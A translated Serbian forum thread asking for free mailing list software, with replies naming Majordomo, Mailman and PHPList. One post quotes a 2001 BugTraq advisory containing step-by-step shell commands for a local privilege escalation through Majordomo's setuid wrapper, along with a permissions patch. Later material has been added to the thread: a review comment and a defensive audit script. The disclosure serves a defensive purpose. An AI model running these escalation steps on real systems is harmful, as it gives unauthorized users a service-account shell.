
Mailing list software


Goran Rakić
Belgrade

Member no.: 999
Posts: 3766

Site: blog.goranrakic.com

Mailing list software - 01.10.2001 at 21:59 (214 months ago)
I need the address of some free script (PHP+MySQL or ASP+Access, but preferably the former) for running a mailing list, meaning subscribing, unsubscribing, EVERYTHING...

Help please
http://sr.libreoffice.org - free office suite, word processing, spreadsheets,
presentations, legal with no licensing costs

Dragoslav Krunić

Member no.: 225
Posts: 1083
*.verat.net

Re: Mailing list software - 01.10.2001 at 22:16 (214 months ago)
Majordomo

Gojko Vujovic
Amsterdam, NL

Administrator
Member no.: 1
Posts: 13630

Re: Mailing list software - 01.10.2001 at 22:25 (214 months ago)
Minordomo

m r v a

Member no.: 8
Posts: 1843
*.yubc.net

Re: Mailing list software - 01.10.2001 at 22:27 (214 months ago)
In doing so, pay attention to security, especially if the machine is multi-user


Taken from BUGTRAQ:
PS: a patch file is also attached at the end ...

>>>-------- CUT BELOW
To: BugTraq
Subject: Majordomo default vulns
Date: Sep 14 2001 11:24AM
Author: Marco van Berkum <m.v.berkum@obit.nl>

Hi,
I found something to discuss, this time involving majordomo.
This was tested on a Slackware linux 8.0 (kernel 2.4.8);
majordomo version 1.94.4, I also tested the other versions
and all _default_ installs had the same problem, note that
the versions 1.94.1 and 1.94.2 should NOT be used anymore,
those are way more simple to exploit.

We all know that if you install majordomo you should
CAREFULLY read the INSTALL file, simply because else
you will have a security problem. Only I doubt that everyone
actually follows the guidelines. Besides that, I feel that
Majordomo developers _could_ make a more secure default
install without affecting the functionality of the program.
A simple patch would _at least_ stop the possibilities which
are described below.

Also I did not find in the documents that majordomo should
have a shell (so give it a nologin or whatever, it works fine
without shell).

An example:

Who am i
marco@anubis:~$ id -a
uid=1001(marco) gid=100(users) groups=100(users)

This could happen if you give it a /home/majordomo

marco@anubis:~$ ls -al /home/|grep majordomo
drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/

Suidbit + executable for everyone (this is where the patch comes in)

marco@anubis:~$ ls -al ~majordomo/wrapper
-rwsr-xr-x 1 root daemon 16451 Aug 31 13:51 /home/majordomo/wrapper*

This is the program I'm going to abuse

marco@anubis:~$ ls -al ~majordomo/archive2.pl
-rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51 /home/majordomo/archive2.pl*

Make a template

marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test

Append majordomo's .bash_profile (or .profile etc..) with your template
using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is,
that one can use /'s, I need wrapper for becoming user majordomo
though).

marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a ~marco/test

Now hit the .bash_profile (sometimes the majordomo admin might need it
and do the same).

marco@anubis:~$ su - majordomo
Password:
majordomo@anubis:~$ id -a
uid=666(majordomo) gid=2(daemon) groups=2(daemon)
majordomo@anubis:~$ exit

See if it worked

marco@anubis:~$ ls -al ~majordomo/sh
lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57 /home/majordomo/sh -> /bin/sh*

Jupz it worked, now someone could abuse it, let's do that.

marco@anubis:~$ ~majordomo/wrapper sh
sh-2.05$ id -a
uid=666(majordomo) gid=2(daemon) groups=100(users)
sh-2.05$

Ok, I'm majordomo.

Also, in the README file is described how one could debug majordomo.

<quote>
Finally, if you're up to mucking around in the perl code, symlinking
perl into ~majordomo and invoking it via wrapper will give you a debug
environment with Majordomo's permissions and view of the world:

~majordomo% ./wrapper perl -d majordomo
</quote>

Well, same problem :)
Don't forget to remove the symlink or else everyone can do this:

marco@anubis:~$ /home/majordomo/wrapper perl
system("/bin/sh");
^D
sh-2.04$

One could append the perlfiles to make them execute your evil code of
course since the archive2 program appends. This could give a majordomo
uid/daemon gid shell.

The main point here is that we can write to majordomo owned files to
simply alter data in the lists or score a shell (and obtaining a daemon
gid).
Reading the INSTALL file carefully will help you to prevent this, but I
prefer to apply a patch before starting the installation to make sure
that the wrapper is not executable for everyone (it _should_ have 4750
and not 4755).

--- simple patch to make default install more secure ---

--- Makefile.orig Fri Sep 14 09:43:45 2001
+++ Makefile Fri Sep 14 09:44:20 2001
@@ -42,7 +42,7 @@
# change these values!
WRAPPER_OWNER = root
WRAPPER_GROUP = $(W_GROUP)
-WRAPPER_MODE = 4755
+WRAPPER_MODE = 4750
POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP)
# Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4,
# HP DomainOS) then comment out the above four lines and uncomment
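
Review bot: WRAPPER_MODE = 4750 still leaves the setuid-root wrapper runnable by every member of WRAPPER_GROUP, which this Makefile sets to $(W_GROUP), so the change only helps if membership of that group is limited to the accounts that must run the wrapper. The comment above the block says only "change these values!"; it would be worth stating next to WRAPPER_MODE that the mode assumes a dedicated group. The change also takes effect only at install time, so a wrapper already installed with 4755 keeps that mode until it is reinstalled or changed by hand.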

just my 2 cents,
grtz,
Marco van Berkum
--
GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---
O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----
G++ e- h+ r y*
+---------------------+------------------+-------------------+
| Marco van Berkum | MB17300-RIPE | Security Engineer |
| http://ws.obit.nl | "Chernobyl used | Network Admin |
| m.v.berkum@obit.nl | Windows" | UNIX |
+---------------------+------------------+-------------------+



<<<<---- END OF EXCERPT

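
The three conditions the advisory above relies on (a wrapper installed 4755 instead of 4750, a shell or perl symlinked into the Majordomo directory, and a list account with a login shell) can be checked on an existing install. The script below is an added example, not part of the thread or of the BugTraq post; the function names, the `/home/majordomo` path and the `majordomo` account name are assumptions.

```shell
#!/bin/sh
# Added example: audit a Majordomo install directory for the three weak
# defaults the advisory describes. Function names are hypothetical.

# Setuid files in directory $1 that any local user may execute (e.g. 4755).
world_exec_setuid() {
    find "$1" -maxdepth 1 -type f -perm -4000 -perm -0001 2>/dev/null
}

# Symlinks in directory $1 that point at a shell or at perl.
interpreter_links() {
    find "$1" -maxdepth 1 -type l 2>/dev/null | while IFS= read -r link; do
        target=$(readlink "$link")
        case "${target##*/}" in
            sh|bash|dash|ksh|zsh|csh|tcsh|perl|perl5*)
                printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# True when the passwd(5) line in $1 gives the account a usable login shell.
# An empty shell field counts, because login then falls back to /bin/sh.
has_login_shell() {
    [ -n "$1" ] || return 1
    case "$(printf '%s\n' "$1" | cut -d: -f7)" in
        */nologin|*/false) return 1 ;;
        *) return 0 ;;
    esac
}

# $1 = install directory, $2 = passwd line of the list account.
# Prints one "FINDING:" line per problem and nothing when the install is clean.
audit_majordomo() {
    world_exec_setuid "$1" | sed 's/^/FINDING: setuid and world-executable, want 4750: /'
    interpreter_links "$1" | sed 's/^/FINDING: interpreter reachable via wrapper: /'
    if has_login_shell "$2"; then
        echo "FINDING: list account has a login shell: $2"
    fi
}

# Usage: sh audit.sh /home/majordomo [account]   (path and name are assumptions)
if [ "$#" -ge 1 ]; then
    audit_majordomo "$1" "$(grep "^${2:-majordomo}:" /etc/passwd)"
fi
```
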

alex
Aleksandar Radulovic
Senior Software Engineer, Spotify
Stockholm, Sweden

Member no.: 71
Posts: 2194
*.as.mi.is

Jabber: alex@a13x.info
ICQ: -1
Site: www.a13x.info

Re: Mailing list software - 02.10.2001 at 01:55 (214 months ago)
One word - mailman!

Alex: My favorite site is http://localhost/
R.J. Oppenheimer: "I am become death, destroyer of worlds" (1945 AD)

Abraxas
Ivan Sofronic
Sabac, Belgrade

Member no.: 109
Posts: 61
*.ptt.yu

ICQ: 35803706
Site: www.SabacOnlineStudios.co..

Re: Mailing list software - 02.10.2001 at 10:33 (214 months ago)
Why do you bother with this so much when you have yahoogroups....dead simple

Dragoslav Krunić

Member no.: 225
Posts: 1083
*.verat.net

Re: Mailing list software - 02.10.2001 at 11:50 (214 months ago)
Quote:
Abraxas wrote:
Why do you bother with this so much when you have yahoogroups....dead simple


Well, I don't know. Do they insert ads?
Besides, this way is sweeter, nicer, and you learn a thing or two....
If someone let me choose between yahoogroups and setting up my own mailing list, I would choose the latter, just for the greater freedom.

prosams
Novi Beograd

Member no.: 716
Posts: 133
*.145.EUnet.yu

Re: Mailing list software - 02.10.2001 at 23:39 (214 months ago)
I have a great Perl mailing list, hsmail.
You have one main .pl file, a variable file and a mail.txt file. When you enter the admin section you have one big text box, and you can type to your heart's content.
Of course you can also delete users. And scr.. those free mailing lists, all you need is a server that supports at least Perl 5.00
Evil does not exist; there is only good present in a small amount.

ingglick
Zemun

Member no.: 76668
Posts: 6
*.rcub.bg.ac.yu.

Re: Mailing list software - 19.12.2005 at 15:09 (163 months ago)
Majordomo, Minordomo and Malone (mailman :) ) require more than I have available at my hosting provider (verat). And that is just a cgi-bin folder and support for perl/php/mysql, nothing like usr/local/sbin or compiling C code...

Can someone recommend a decent script that works one way or another? I got lost in a sea of free scripts, and I don't have time to develop one myself. Yahoo Stop!
:)

Thanks in advance...

Mracni
Krusevac

Member no.: 47117
Posts: 52
*.vdial.verat.net.

Site: 037ks.com

Re: Mailing list software - 19.12.2005 at 22:04 (163 months ago)
eNewsletter Manager - FREE - Extremely simple to use, it installs on your computer like an e-mail client, you build the address databases yourself by simply typing them in, it's free and it WORKS!

Just type the name into a search engine, I don't remember where I downloaded it.
No more lies

ingglick
Zemun

Member no.: 76668
Posts: 6
*.103.EUnet.yu.

Re: Mailing list software - 19.12.2005 at 22:11 (163 months ago)
Thanks for the reply, I'll take a look, although the name seems very suspicious to me: "eNewsletter Manager" still sounds like a program for newsletters, not for a mailing list.

ingglick
Zemun

Member no.: 76668
Posts: 6
*.rcub.bg.ac.yu.

Re: Mailing list software - 20.12.2005 at 15:40 (163 months ago)
An additional question for the colleagues who recommended majordomo, minordomo and mailman.

Where can I host some of those scripts?

zlatko-kg
Zlatko Stojanovic
Kragujevac

Member no.: 75437
Posts: 51
*.dialup.neobee.net.

Site: www.123rf.com/src_zlatko/..

Re: Mailing list software - 27.12.2005 at 11:34 (163 months ago)
PHPList

http://tincan.co.uk/?lid=294

Royalty Free - Stock Image and Photo WWW.SHUTTERSTOCK.COM - WWW.123RF.COM - WWW.DREAMSTIME.COM
